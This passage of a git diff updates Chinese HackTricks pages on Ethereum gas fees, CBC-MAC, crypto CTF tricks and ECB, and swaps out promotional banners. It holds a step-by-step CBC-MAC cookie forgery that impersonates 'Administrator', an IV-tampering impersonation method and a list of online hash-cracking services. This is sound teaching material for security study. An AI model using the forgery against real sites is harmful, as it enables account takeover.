gwei,而不是说您的gas费用为0.000000001 ether。'gwei'这个词本身意味着'吉博-韦',它等于**1,000,000,000 wei**。Wei本身是**ETH的最小单位**。 - -要计算交易将花费的gas,请阅读以下示例: - -假设Jordan必须向Taylor支付1 ETH。在交易中,gas限制为21,000单位,基本费用为100 gwei。Jordan还包括10 gwei的小费。 - -使用上述公式,我们可以计算为`21,000 * (100 + 10) = 2,310,000 gwei`或0.00231 ETH。 - -当Jordan发送资金时,将从Jordan的账户中扣除1.00231 ETH。Taylor将收到1.0000 ETH。矿工将获得0.00021 ETH的小费。基本费用0.0021 ETH被销毁。 - -此外,Jordan还可以为交易设置一个最大费用(`maxFeePerGas`)。实际费用与最大费用之间的差额将退还给Jordan,即`refund = max fee - (base fee + priority fee)`。Jordan可以设置一个最大支付交易执行的金额,并在交易执行时不必担心支付超出基本费用的费用。 - -由于基本费用是根据对区块空间的需求由网络计算的,因此最后一个参数:maxFeePerGas有助于控制将支付的最大费用。 - -## 交易 - -请注意,在**以太坊**网络中,交易是在2个地址之间执行的,这些地址可以是**用户或智能合约地址**。\ -**智能合约**通过**特殊**的**交易**存储在分布式分类账中。 - -改变EVM状态的交易需要广播到整个网络。任何节点都可以广播要求在EVM上执行交易;发生这种情况后,**矿工**将**执行**交易并将结果状态更改传播到网络的其余部分。\ -交易需要**费用**,必须进行挖矿才能变得有效。 - -提交的交易包括以下信息: - -- `recipient` – 接收地址(如果是外部拥有的账户,则交易将转移价值。如果是合同账户,则交易将执行合同代码) -- `signature` – 发件人的标识符。当发件人的私钥签署交易并确认发件人已授权此交易时,将生成此标识符 -- `value` – 从发件人转移到接收方的ETH金额(以WEI为单位,是ETH的一个单位) -- `data` – 包含任意数据的可选字段 -- `gasLimit` – 交易可以消耗的最大gas单位数量。gas单位代表计算步骤 -- `maxPriorityFeePerGas` - 包含为矿工提供的小费的最大gas数量 -- `maxFeePerGas` - 为交易愿意支付的最大gas数量(包括`baseFeePerGas`和`maxPriorityFeePerGas`) - -请注意,没有任何字段用于原始地址,这是因为这可以从签名中推断出来。 +这些实践和机制对于任何希望参与加密货币并优先考虑隐私和安全性的人都是基础性的。 ## 参考资料 -- [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) -- [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) -- [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) -- [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) -- [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) -- [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) +* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) +* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) +* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) +* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) +* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) +* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) diff --git a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index f62ccf8f5..3b6fa70a5 100644 --- a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} # CBC @@ -19,21 +20,21 @@ # CBC-MAC -在密码学中,**密码块链接消息认证码**(**CBC-MAC**)是一种从块密码构造消息认证码的技术。消息使用某种块密码算法在CBC模式下加密,以创建一个**块链,使得每个块依赖于前一个块的正确加密**。这种相互依赖确保对**任何**明文**位**的更改将导致**最终加密块**以一种不能预测或抵消的方式发生**更改**,而不知道块密码的密钥。 +**密码块链接消息认证码**(**CBC-MAC**)是密码学中使用的一种方法。它通过逐块加密消息来工作,其中每个块的加密与前一个块相关联。这个过程创建了一个**块链**,确保即使更改原始消息的一个位,也会导致加密数据的最后一个块发生不可预测的变化。要进行或逆转这样的更改,需要加密密钥,确保安全性。 -要计算消息m的CBC-MAC,需要使用零初始化向量在CBC模式下加密m并保留最后一个块。以下图示了使用秘密密钥k和块密码E计算消息包含块的CBC-MAC![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5)的计算过程: +要计算消息 m 的 CBC-MAC,需要使用零初始化向量在 CBC 模式下加密 m 并保留最后一个块。以下图示了使用秘密密钥 k 和块密码 E 计算消息组成的块的 CBC-MAC 的计算过程![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5): -![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) +![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # 漏洞 -使用CBC-MAC时,通常使用的**IV为0**。\ -这是一个问题,因为独立的2个已知消息(`m1`和`m2`)将生成2个签名(`s1`和`s2`)。因此: +使用 CBC-MAC 时通常使用的**初始化向量为 0**。\ +这是一个问题,因为独立的 2 个已知消息(`m1` 和 `m2`)将生成 2 个签名(`s1` 和 `s2`)。因此: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -然后,由m1和m2连接而成的消息(m3)将生成2个签名(s31和s32): +然后,由 m1 和 m2 连接而成的消息(m3)将生成 2 个签名(s31 和 s32): * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` @@ -46,36 +47,37 @@ * `rator\00\00\00` 您可以创建一个名为**Administ**(m1)的用户名并检索签名(s1)。\ -然后,您可以创建一个名为`rator\00\00\00 XOR s1`结果的用户名。这将生成`E(m2 XOR s1 XOR 0)`,即s32。\ -现在,您可以使用s32作为完整名称**Administrator**的签名。 +然后,您可以创建一个用户名,称为`rator\00\00\00 XOR s1`的结果。这将生成`E(m2 XOR s1 XOR 0)`,即 s32。\ +现在,您可以使用 s32 作为完整名称**Administrator**的签名。 ### 总结 -1. 获取用户名**Administ**(m1)的签名,即s1 -2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为s32**。** -3. 将cookie设置为s32,它将成为用户**Administrator**的有效cookie。 +1. 获取用户名**Administ**(m1)的签名,即 s1 +2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为 s32**.** +3. 将 cookie 设置为 s32,它将成为用户**Administrator**的有效 cookie。 -# 攻击控制IV +# 攻击控制 IV -如果您可以控制使用的IV,则攻击可能会变得非常容易。\ -如果cookie只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其cookie。\ -现在,如果您可以控制IV,您可以更改IV的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的cookie。这个cookie将有效地**冒充**初始**IV**下的用户**administrator**。 +如果您可以控制使用的 IV,则攻击可能会变得非常容易。\ +如果 cookie 只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其 cookie。\ +现在,如果您可以控制 IV,您可以更改 IV 的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的 cookie。这个 cookie 将有效地**冒充**初始**IV**的用户**administrator**。 -# 参考 +## 参考 更多信息请参阅[https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/crypto-and-stego/crypto-ctfs-tricks.md b/crypto-and-stego/crypto-ctfs-tricks.md index c33b1960f..e3375493b 100644 --- a/crypto-and-stego/crypto-ctfs-tricks.md +++ b/crypto-and-stego/crypto-ctfs-tricks.md @@ -1,130 +1,84 @@ # Crypto CTFs 技巧 +{% hint style="success" %} +学习并练习 AWS 黑客技巧:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技巧:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 上关注我们 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ## 在线哈希数据库 -- _**谷歌搜索**_ -- [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) -- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) -- [https://crackstation.net/](https://crackstation.net) -- [https://md5decrypt.net/](https://md5decrypt.net) -- [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com) -- [https://gpuhash.me/](https://gpuhash.me) -- [https://hashes.org/search.php](https://hashes.org/search.php) -- [https://www.cmd5.org/](https://www.cmd5.org) -- [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) -- [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) +* _**谷歌搜索**_ +* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) +* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) +* [https://crackstation.net/](https://crackstation.net) +* [https://md5decrypt.net/](https://md5decrypt.net) +* [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com) +* [https://gpuhash.me/](https://gpuhash.me) +* [https://hashes.org/search.php](https://hashes.org/search.php) +* [https://www.cmd5.org/](https://www.cmd5.org) +* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) +* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) ## 魔术自动解密器 -- [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) -- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)(魔术模块) -- [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) -- [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) +* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (魔术模块) +* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) ## 编码器 -大多数编码数据可以使用以下两个资源解码: +大多数编码数据可以使用以下两个资源进行解码: -- [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) -- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### 替换自动解密器 -- [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -- [https://quipqiup.com/](https://quipqiup.com) - 非常好! +* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) +* [https://quipqiup.com/](https://quipqiup.com) - 非常好! #### 凯撒密码 - ROTx 自动解密器 -- [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) +* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) #### 阿特巴什密码 -- [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) +* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) ### 基础编码自动解密器 -使用以下链接检查所有这些基础:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) - -- **Ascii85** -- `BQ%]q@psCd@rH0l` -- **Base26** \[_A-Z_] -- `BQEKGAHRJKHQMVZGKUXNT` -- **Base32** \[_A-Z2-7=_] -- `NBXWYYLDMFZGCY3PNRQQ====` -- **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] -- `pbzsaamdcf3gna5xptoo====` -- **Base32 Geohash** \[_0-9b-hjkmnp-z_] -- `e1rqssc3d5t62svgejhh====` -- **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] -- `D1QPRRB3C5S62RVFDHGG====` -- **Base32 Extended Hexadecimal** \[_0-9A-V_] -- `D1NMOOB3C5P62ORFDHGG====` -- **Base45** \[_0-9A-Z $%\*+-./:_] -- `59DPVDGPCVKEUPCPVD` -- **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] -- `2yJiRg5BF9gmsU6AC` -- **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] -- `2YiHqF5bf9FLSt6ac` -- **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] -- `pyJ5RgnBE9gm17awU` -- **Base62** \[_0-9A-Za-z_] -- `g2AextRZpBKRBzQ9` -- **Base64** \[_A-Za-z0-9+/=_] -- `aG9sYWNhcmFjb2xh` -- **Base67** \[_A-Za-z0-9-_.!\~\_] -- `NI9JKX0cSUdqhr!p` -- **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -- `BQ%]q@psCd@rH0l` -- **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -- `<~BQ%]q@psCd@rH0l~>` -- **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] -- `Xm4y`V\_|Y(V{dF>\` -- **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` -- **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] -- `Xm4y|V{~Y+V}dF?` -- **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] -- `frDg[*jNN!7&BQM` -- **Base100** \[] -- `👟👦👣👘👚👘👩👘👚👦👣👘` -- **Base122** \[] -- `4F ˂r0Xmvc` -- **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] -- `MIc3KiXa+Ihz+lrXMIc3KbCC` -- **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] -- `DmPsv8J7qrlKEoY7` -- **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] -- `kLD8iwKsigSalLJ5` -- **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] -- `ayRiIo1gpO+uUc7g` -- **ESAB46** \[] -- `3sHcL2NR8WrT7mhR` -- **MEGAN45** \[] -- `kLD8igSXm2KZlwrX` -- **TIGO3FX** \[] -- `7AP9mIzdmltYmIP9mWXX` -- **TRIPO5** \[] -- `UE9vSbnBW6psVzxB` -- **FERON74** \[] -- `PbGkNudxCzaKBm0x` -- **GILA7** \[] -- `D+nkv8C1qIKMErY1` -- **Citrix CTX1** \[] -- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` +使用以下链接检查所有这些基础编码:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] +* `DmPsv8J7qrlKEoY7` +* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] +* `kLD8iwKsigSalLJ5` +* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] +* `ayRiIo1gpO+uUc7g` +* **ESAB46** \[] +* `3sHcL2NR8WrT7mhR` +* **MEGAN45** \[] +* `kLD8igSXm2KZlwrX` +* **TIGO3FX** \[] +* `7AP9mIzdmltYmIP9mWXX` +* **TRIPO5** \[] +* `UE9vSbnBW6psVzxB` +* **FERON74** \[] +* `PbGkNudxCzaKBm0x` +* **GILA7** \[] +* `D+nkv8C1qIKMErY1` +* **Citrix CTX1** \[] +* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` [http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) @@ -136,17 +90,13 @@ ### Morse -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - -### 摩尔斯 +### Morse ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 页面不存在: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) -### UUencoder - -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 死链: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +### UU编码器 ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( @@ -157,7 +107,7 @@ end ``` * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) -### XXEncoder +### XX编码器 ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 @@ -186,10 +136,6 @@ ryvkryvkryvkryvkryvkryvkryvk ``` * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) -### ASCII85 - -* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) - ### ASCII85 ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> @@ -235,7 +181,7 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ## 压缩 -**原始压缩** 和 **原始解压**(您可以在 Cyberchef 中找到)可以在没有标头的情况下压缩和解压数据。 +**原始压缩** 和 **原始解压**(你可以在 Cyberchef 中找到)可以压缩和解压数据而不包含头部信息。 ## 简单加密 @@ -263,7 +209,7 @@ wodsyoidrods ### Fernet -2个base64字符串(令牌和密钥) +2个base64字符串(token和key) ``` Token: gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== @@ -294,16 +240,17 @@ Key: * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)! +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。 -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} diff --git a/crypto-and-stego/electronic-code-book-ecb.md b/crypto-and-stego/electronic-code-book-ecb.md index bf9c8a830..c54317608 100644 --- a/crypto-and-stego/electronic-code-book-ecb.md +++ b/crypto-and-stego/electronic-code-book-ecb.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
